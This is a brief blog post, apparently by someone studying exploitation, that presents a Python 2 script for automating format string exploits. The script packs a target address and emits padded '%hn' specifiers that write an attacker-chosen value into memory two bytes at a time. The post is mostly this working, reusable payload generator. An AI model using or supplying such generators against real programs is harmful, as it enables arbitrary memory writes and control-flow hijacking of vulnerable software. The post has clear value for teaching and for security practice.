Those annoying format string exploits

Format string exploits are a pain to write manually.  And it's really easy to make an error, adjust a bunch of stuff, then realize that you had the wrong offset and everything needs to be re-calculated.  I got fed up tonight and (based off of the short (2 byte) write examples in this [Table 12-2]) wrote a little program to automate it for me.  I know there are many examples of this out there (@tlas toolbelt...etc), but I felt like I needed to go through the process to cement my understanding of it.  And I like python more than perl. SO:


#! /usr/bin/env python
from sys import argv
import struct


if len(argv) < 4:
 print 'usage:\n\t'+argv[0]+'  <addr_to_write_to>  <addr_to_write> <offset>'
 exit(0)

addr_to_write_to = int(argv[1], 16)
addr_to_wite     = int(argv[2], 16)
offset           = int(argv[3])

HOB = int((addr_to_wite & 0xffff0000) >> 16)
LOB = int((addr_to_wite & 0x0000ffff))

s = ''
if (HOB < LOB):
 s += struct.pack('<I', addr_to_write_to+2)
 s += struct.pack('<I', addr_to_write_to)
 s += '%.'+str(HOB-8)+'x'
 s += '%'+str(offset)+'$hn'
 s += '%.'+str(LOB-HOB)+'x'
 s += '%'+str(offset+1)+'$hn'
elif (HOB > LOB):
 s += struct.pack('<I', addr_to_write_to+2)
 s += struct.pack('<I', addr_to_write_to)
 s += '%.'+str(LOB-8)+'x'
 s += '%'+str(offset+1)+'$hn'
 s += '%.'+str(HOB-LOB)+'x'
 s += '%'+str(offset)+'$hn'
else: #HOB == LOB
 s += struct.pack('<I', addr_to_write_to+2)
 s += struct.pack('<I', addr_to_write_to)
 s += '%.'+str(HOB-8)+'x'
 s += '%'+str(offset)+'$hn'
 s += '%.'+str(0x10000)+'x'
 s += '%'+str(offset+1)+'$hn'

print s